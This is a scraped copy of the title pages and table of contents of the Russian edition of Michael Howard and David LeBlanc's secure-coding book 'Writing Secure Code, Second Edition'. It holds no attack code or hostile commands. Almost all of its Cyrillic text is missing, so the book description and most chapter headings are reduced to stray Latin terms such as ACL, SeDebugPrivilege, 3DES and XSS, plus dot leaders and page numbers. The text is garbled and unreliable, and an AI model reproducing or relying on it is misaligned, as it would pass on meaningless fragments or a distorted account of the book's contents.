Вы находитесь на странице: 1из 698

,

, .

, ,
, .

Michael Howard
David LeBlank

WRITING

SECURE

CODE
Second Edition

2- ,

2005

004.45
32.973.26018.2
X68
., .
X68

/. . 2 ., . .:
, 2005. 704 .: .
ISBN 9785750202386




. , 
, 
, , 
. 
C# Perl.
, Win
dows Security Push Microsoft.
, , 
, ,
, , ,
.
24 , 5 , 
.

004.45
32.973.26018.2
Microsoft Corporation, , 
, .
Active Directory, ActiveX, Authenticode, Hotmail, JScript, Microsoft, Microsoft Press, MSDN, MSDOS,
Visual Basic, Visual C++, Visual Studio, Win32, Windows, Windows NT 
Microsoft / .
.
, , , Web, ,
, , , ,
, , , Web, ,
, .

ISBN 0735617228 (.)


ISBN 9785750202386

,
Microsoft Corporation, 2003
, Microsoft Corporation,
20032004
, 
, 2005

XX

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXI
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XXIII

Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
1: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2: ,
. . . . . . . . . . . . . . . . . . . . . . . . 17
3: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
4: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . 18
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18

VI

19

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

34
35
36
36
36
36
37
37
38
38
39
39
39
40
40
40
41
41
41

3 ,

43

SD : , . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

21
22
24
25
25
26
26
27
27
28
31
34
34

43
44
45
45
46
46

VII

, . . . . . . . . . . . . . . . . .
. . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . .
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
, ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

57
57
58
58
59

60

48
49
50
51
53
55
55
55


. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
. . . . . . . . . . . . . . . . . . 79
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
, . . . . . . . . . . . . . . . . . . 99
, , MAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
, . . . . 100
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101
, . . . . . . . . . . . . . . . . . . . 101
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106

I I

1:

107
108

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118

VIII

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Unicode ANSI . . . . . . . . . . . . . . . . . . 130
, Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
. . . . . . . . . . 142
/GS Visual C++ .NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146

147

ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
: . . . . . . . . . . . . . . . . . . . . . . . . 149
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
ACL Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159
ACL Active Template Library . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
SID
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
DACL ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
, DACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
.NET Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
COM+ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
SQL Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
. . . . . . . . . . . . . . 175
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176

177

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
SeBackupPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
SeRestorePrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184

IX

SeDebugPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184
SeTcbPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeAssignPrimaryTokenPrivilege SeIncreaseQuotaPrivilege . . . . . . . . . 185
SeLoadDriverPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
SeRemoteShutdownPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
SeTakeOwnershipPrivilege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
, , SID, ACL . . . . . . . . . . . . . . . . . . . . . 187
SID ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . 188
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
,  . . . . . . . 190
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
LSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
1: , . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
2: , API
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
3: , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
4: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
5: SID . . . . 199
6: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 199
Windows XP/.NET
Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Windows .NET Server 2003 . . . . . . . . . . . . . . . . . . . . . . . . 214
,  . . . . . . . . . . . . . . . 215
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218

222

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
rand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Win32 . . . . . . . . . . . . . . . . . . . . . . . 225
. . . . . . . . . 230
Web . . . . . . . . . . 230
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
, . . . . . . . . . . . . . . . . . . 247
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 248
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
: , . . . . . . . . . . . . . . . . . . . . . . . 249
. . . . . . . . 254
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256

257

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
PKCS #5 . . . . . . . . . . . . . . . . . . . . . . . 261
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
Windows 2000 . . . . . . . . . . . . . . . . . . . . . . . . . . 262
: Windows XP . . . . . . . . . . . . . . . . . . . . . . . . 265
Windows NT 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Windows 95/98/Me Windows CE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
PnP . . . . . . . . . . . . . . . . . . . . . . . . 271
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
FAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
XOR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
3DES
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
3DES ,
,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291

XI

3DES,
, ,
ACL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292

10

293

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
, . . . . . . . . . . . . . . . . . 296
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 300
. . . . . . . . . . . . . . . . . . . . . 301
( ) . . . . . . . . . . . . . . . . . . . . . . . 303
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307
Perl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 308
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
, . . . . . . . . . . . . . . . . . . . . . . 310
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311

11

312

. . . . . . . . . . . . . . . . . . . 313
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Napster . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Mac OS X Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
/tmp StarOffice
Sun . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Windows . . . . . . . . . . . . . . . . . . . . . . . . 315
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
AOL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
eEye . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Internet Explorer 4. IP . . . . . . . . . . . . . . . . . . . . . . . . . 322
, ::$DATA Internet Information Server 4.0 . . . . . . . . . . . 323
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
. . . . . . . . . . . . . 328
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . . . . . . . . . . . . . 329
. . . . . . . . . . . . . . 330
8.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . 331

XII

PATH
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
. . . . . . . . . . . . . . . . . . . . . . . . . . 332
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
Web . . . . . . . . . . . . . . . . . . . . . . . . . . 336
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
UTF8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337
: ,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341

12

342

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
1: . . . . . . . . . . . . . . . . . . . . . . . . . 345
2: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
1:
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
2: SQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354

13 Web-

355

 : . . . . . 355
<SCRIPT> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
, XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
